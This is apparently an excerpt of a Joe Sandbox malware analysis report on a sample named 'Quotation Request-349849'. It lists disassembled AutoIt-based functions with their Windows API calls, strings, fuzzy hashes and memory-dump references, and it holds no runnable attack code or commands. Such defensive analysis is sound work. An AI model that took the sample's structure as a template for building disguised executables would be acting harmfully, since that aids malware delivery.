                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 742c8b4f60bd4b7fa750abf500f79e3fa17a0e16c0481ef2b1b729e4aefe27fd
                                                      • Instruction ID: 060bc7d535db0ad557264f1b0af1c5c19f2c38a4421bf9f7151a55c164eff539
                                                      • Opcode Fuzzy Hash: 742c8b4f60bd4b7fa750abf500f79e3fa17a0e16c0481ef2b1b729e4aefe27fd
                                                      • Instruction Fuzzy Hash: 7BA15CB1A40609BFEB149BA4DD4AFAE7BB9FB08711F044115FA15EB2E1D774AD00CB60
                                                      Function 0083AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083AD1E
                                                      • GetDriveTypeW.KERNEL32(?,0085FAC0,?,\\.\,0085F910), ref: 0083ADFB
                                                      • SetErrorMode.KERNEL32(00000000,0085FAC0,?,\\.\,0085F910), ref: 0083AF59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 47e2785da71437a494a506700a4d3b7ecfd8bd80f116f5c332266df1dd4678d9
                                                      • Instruction ID: edb86ceef90d4fdbf7b0368464c7ef2749ba3d4102aec12b2da443c4fcf2d9d5
                                                      • Opcode Fuzzy Hash: 47e2785da71437a494a506700a4d3b7ecfd8bd80f116f5c332266df1dd4678d9
                                                      • Instruction Fuzzy Hash: 6E519DB4648209EB8B18EB14D982CBD73A1FFC8714FA04156E496E73D1DE399D01EB83
                                                      Function 007D68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 0c610ce58fba5fc884884a47ceb778c69072653a0b4fc28fba5dc4648fe5cb36
                                                      • Instruction ID: 4bcb088dd6c8ca6ff9a13af077b63376b16192c3916c80886f7725192128e06b
                                                      • Opcode Fuzzy Hash: 0c610ce58fba5fc884884a47ceb778c69072653a0b4fc28fba5dc4648fe5cb36
                                                      • Instruction Fuzzy Hash: BE81E9B1640219EACB20BA60DC56FBB3778FF15750F044026FD45AA3D6EB68D945C261
                                                      Function 00859A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00859AD2
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00859B8B
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00859BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 8f6de9cf3c9f9ac9b7ff1fd75ba9b89d541f0c2c2237062fdcb5e1824696d61e
                                                      • Instruction ID: e36e382537a871ca4eb9312b07e5fe5c26ed0aa6c639089931f59d4d324c0f2e
                                                      • Opcode Fuzzy Hash: 8f6de9cf3c9f9ac9b7ff1fd75ba9b89d541f0c2c2237062fdcb5e1824696d61e
                                                      • Instruction Fuzzy Hash: 27028930104301EFEB25CF24C889BAABBE5FF49316F04852DF9D9D62A1D7799948CB52
                                                      Function 0085A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0085A903
                                                      • SetTextColor.GDI32(?,?), ref: 0085A907
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0085A91D
                                                      • GetSysColor.USER32(0000000F), ref: 0085A928
                                                      • CreateSolidBrush.GDI32(?), ref: 0085A92D
                                                      • GetSysColor.USER32(00000011), ref: 0085A945
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085A953
                                                      • SelectObject.GDI32(?,00000000), ref: 0085A964
                                                      • SetBkColor.GDI32(?,00000000), ref: 0085A96D
                                                      • SelectObject.GDI32(?,?), ref: 0085A97A
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0085A999
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085A9B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0085A9C5
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085A9ED
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0085AA14
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0085AA32
                                                      • DrawFocusRect.USER32(?,?), ref: 0085AA3D
                                                      • GetSysColor.USER32(00000011), ref: 0085AA4B
                                                      • SetTextColor.GDI32(?,00000000), ref: 0085AA53
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0085AA67
                                                      • SelectObject.GDI32(?,0085A5FA), ref: 0085AA7E
                                                      • DeleteObject.GDI32(?), ref: 0085AA89
                                                      • SelectObject.GDI32(?,?), ref: 0085AA8F
                                                      • DeleteObject.GDI32(?), ref: 0085AA94
                                                      • SetTextColor.GDI32(?,?), ref: 0085AA9A
                                                      • SetBkColor.GDI32(?,?), ref: 0085AAA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: ac0adfce976a95b0d3271c2436e8f4149edc91692df9f91687e8b899d918e1a5
                                                      • Instruction ID: 730d06516d9eb4e6827c546c460e05ca6b8122e3663a8d46227a7f29fad565eb
                                                      • Opcode Fuzzy Hash: ac0adfce976a95b0d3271c2436e8f4149edc91692df9f91687e8b899d918e1a5
                                                      • Instruction Fuzzy Hash: CE512D71900218EFDF119FA4DC48EAE7BB9FB08322F114625FA11AB2A2D7759940DF90
                                                      Function 008589D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00858AC1
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858AD2
                                                      • CharNextW.USER32(0000014E), ref: 00858B01
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00858B42
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00858B58
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00858B69
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00858B86
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00858BD8
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00858BEE
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00858C1F
                                                      • _memset.LIBCMT ref: 00858C44
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00858C8D
                                                      • _memset.LIBCMT ref: 00858CEC
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00858D16
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00858D6E
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00858E1B
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00858E3D
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00858E87
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00858EB4
                                                      • DrawMenuBar.USER32(?), ref: 00858EC3
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00858EEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: bab9ad65d826c933883c8da9fbe4a7e965610675a4010bcb6abfa8ceb4286bd1
                                                      • Instruction ID: e177743a2d1e9931239eb9bc7b5232befd1398e23189c0ff05e703b4904d0a8f
                                                      • Opcode Fuzzy Hash: bab9ad65d826c933883c8da9fbe4a7e965610675a4010bcb6abfa8ceb4286bd1
                                                      • Instruction Fuzzy Hash: 86E15E70900218EBDB219F54CC84EEE7BB9FF09711F10815AFE15EA291DB748A89DF61
                                                      Function 0085488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 008549CA
                                                      • GetDesktopWindow.USER32 ref: 008549DF
                                                      • GetWindowRect.USER32(00000000), ref: 008549E6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00854A48
                                                      • DestroyWindow.USER32(?), ref: 00854A74
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00854A9D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00854ABB
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00854AE1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00854AF6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00854B09
                                                      • IsWindowVisible.USER32(?), ref: 00854B29
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00854B44
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00854B58
                                                      • GetWindowRect.USER32(?,?), ref: 00854B70
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00854B96
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00854BB0
                                                      • CopyRect.USER32(?,?), ref: 00854BC7
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00854C32
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: bc45b385ac19da65e44d2b1ad216b730b58b9f26310f58629492068c1a41e5bc
                                                      • Instruction ID: 21b004bcbe1811f635132b5ae86b2aa345c6e1fa6bb967c172e4a9beb60b1e6f
                                                      • Opcode Fuzzy Hash: bc45b385ac19da65e44d2b1ad216b730b58b9f26310f58629492068c1a41e5bc
                                                      • Instruction Fuzzy Hash: BAB19A70604350AFDB04DF64C849B6ABBE4FF88319F00891DF9999B2A1D774EC49CB56
                                                      Function 0083449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008344AC
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008344D2
                                                      • _wcscpy.LIBCMT ref: 00834500
                                                      • _wcscmp.LIBCMT ref: 0083450B
                                                      • _wcscat.LIBCMT ref: 00834521
                                                      • _wcsstr.LIBCMT ref: 0083452C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00834548
                                                      • _wcscat.LIBCMT ref: 00834591
                                                      • _wcscat.LIBCMT ref: 00834598
                                                      • _wcsncpy.LIBCMT ref: 008345C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 7905ffaa3bf77ffe004dc6ad93069abe2911036cf8c485d7847b1320ef1275a7
                                                      • Instruction ID: a9e688153085b4049e90532e597d4d67caa4b97e1680a328acaf93741f67fea8
                                                      • Opcode Fuzzy Hash: 7905ffaa3bf77ffe004dc6ad93069abe2911036cf8c485d7847b1320ef1275a7
                                                      • Instruction Fuzzy Hash: E641D671A41208BBDB11BA748C0BEBF776CFF95710F500069FA05E6383EA6CA90186E5
                                                      Function 007D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 007D28C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007D28EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 007D28F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 007D291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007D2939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007D2949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007D297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007D2990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 007D29AE
                                                      • GetStockObject.GDI32(00000011), ref: 007D29CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 007D29D5
                                                        • Part of subcall function 007D2344: GetCursorPos.USER32(?), ref: 007D2357
                                                        • Part of subcall function 007D2344: ScreenToClient.USER32(008957B0,?), ref: 007D2374
                                                        • Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000001), ref: 007D2399
                                                        • Part of subcall function 007D2344: GetAsyncKeyState.USER32(00000002), ref: 007D23A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,007D1256), ref: 007D29FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: f4eae614ea925c8fb5de9ba99b1e58372e4c2124a0d490e32abd9d0d401aa79e
                                                      • Instruction ID: ec648d0fbe114a191c18b6c34333eed8666a3cab9ecd5abeed89c9697b31ec78
                                                      • Opcode Fuzzy Hash: f4eae614ea925c8fb5de9ba99b1e58372e4c2124a0d490e32abd9d0d401aa79e
                                                      • Instruction Fuzzy Hash: 45B1707160060AEFDB15DFA8DC45BAE7BB4FB58311F10422AFA15E72D1DB78A842CB50
                                                      Function 0082A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0082A47A
                                                      • __swprintf.LIBCMT ref: 0082A51B
                                                      • _wcscmp.LIBCMT ref: 0082A52E
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0082A583
                                                      • _wcscmp.LIBCMT ref: 0082A5BF
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0082A5F6
                                                      • GetDlgCtrlID.USER32(?), ref: 0082A648
                                                      • GetWindowRect.USER32(?,?), ref: 0082A67E
                                                      • GetParent.USER32(?), ref: 0082A69C
                                                      • ScreenToClient.USER32(00000000), ref: 0082A6A3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0082A71D
                                                      • _wcscmp.LIBCMT ref: 0082A731
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0082A757
                                                      • _wcscmp.LIBCMT ref: 0082A76B
                                                        • Part of subcall function 007F362C: _iswctype.LIBCMT ref: 007F3634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: 59482460bad1c0ad12cf958296b5852d4fda05a6448f8e36c88debffa30cde09
                                                      • Instruction ID: 8313a1f324d348f1083478d7ab1d9d9f7fb307295873156adb17affc7ef39872
                                                      • Opcode Fuzzy Hash: 59482460bad1c0ad12cf958296b5852d4fda05a6448f8e36c88debffa30cde09
                                                      • Instruction Fuzzy Hash: 28A1F271204326EFDB18DF60D888FAAB7E8FF54304F008529F999D2191DB34E995CB92
                                                      Function 0082AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0082AF18
                                                      • _wcscmp.LIBCMT ref: 0082AF29
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0082AF51
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0082AF6E
                                                      • _wcscmp.LIBCMT ref: 0082AF8C
                                                      • _wcsstr.LIBCMT ref: 0082AF9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0082AFD5
                                                      • _wcscmp.LIBCMT ref: 0082AFE5
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0082B00C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0082B055
                                                      • _wcscmp.LIBCMT ref: 0082B065
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0082B08D
                                                      • GetWindowRect.USER32(00000004,?), ref: 0082B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: f5940f6b239d0772ec6245bba06da60fb75da1baea94322a5189e680e70a3976
                                                      • Instruction ID: 28ed31462df577b58cda2de59afee1d9fc467fc47a8af3a1155e1dc771e66d57
                                                      • Opcode Fuzzy Hash: f5940f6b239d0772ec6245bba06da60fb75da1baea94322a5189e680e70a3976
                                                      • Instruction Fuzzy Hash: 5381CE711083199BDB05DF14D985FAA7BE8FF84314F04846AFD85CA192DB38DD89CBA2
                                                      Function 0082ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: 526842adf771ed92feb9ac66a01c0aacad4b4ef1823912d868712350f41cce9f
                                                      • Instruction ID: 96c58bffa944697c29e48aedf590ad749f8e2990aac4ccbbf18dd1527474b96d
                                                      • Opcode Fuzzy Hash: 526842adf771ed92feb9ac66a01c0aacad4b4ef1823912d868712350f41cce9f
                                                      • Instruction Fuzzy Hash: 5E319070548229EBDA1CFA64EE47EBE7774FF10750F70042AB821F12D1EA69AF44C652
                                                      Function 00844FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00845013
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0084501E
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00845029
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00845034
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0084503F
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0084504A
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00845055
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00845060
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0084506B
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00845076
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00845081
